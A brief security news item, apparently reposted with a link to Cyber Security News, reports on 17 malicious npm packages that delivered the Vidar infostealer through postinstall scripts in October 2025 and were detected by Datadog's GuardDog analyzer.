Between October 21 and 26, 2025, threat actors released 17 malicious npm packages, tricking developers into downloading them by using legitimate-sounding names. This operation targeted Windows systems, delivering the Vidar infostealer malware through postinstall scripts. These scripts automatically executed upon package installation, facilitating the download of an encrypted ZIP file from compromised infrastructure. The malware collects sensitive information such as browser credentials and cryptocurrency wallets, then uses hardcoded Telegram accounts to find command-and-control servers. Following the exfiltration of data, it deletes its presence to evade detection.
Datadog Security Labs uncovered the attack using their GuardDog static analyzer, which flagged several malicious indicators. The use of deceptive package names and apparent legitimacy enabled the malware to propagate extensively before being removed from the npm registry. Notably, this campaign reflects a notable evolution in how Vidar has traditionally spread, moving away from phishing attacks. The packages existed on npm for about two weeks, making it one of the most significant malware campaigns exploiting npm’s ecosystem.
👉 Pročitaj original: Cyber Security News
